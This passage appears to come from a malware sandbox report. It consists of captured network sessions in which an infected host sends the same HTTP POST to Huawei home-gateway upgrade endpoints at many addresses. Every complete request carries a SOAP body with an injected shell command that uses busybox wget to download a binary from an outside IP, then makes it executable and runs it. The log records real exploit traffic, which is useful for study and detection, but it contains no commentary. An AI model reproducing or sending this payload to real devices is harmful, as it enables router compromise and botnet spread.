                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1204192.168.2.153870041.88.90.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176203966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1205192.168.2.153713041.29.98.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176249027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1206192.168.2.154170241.142.193.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176273108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1207192.168.2.154730241.148.96.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176273108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1208192.168.2.155865841.28.224.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176323891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1209192.168.2.154246041.59.30.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176347017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1210192.168.2.153474241.209.114.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176347971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1211192.168.2.155923241.47.92.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176373959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1212192.168.2.154769841.6.84.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176403999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1213192.168.2.154083041.101.225.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176435947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
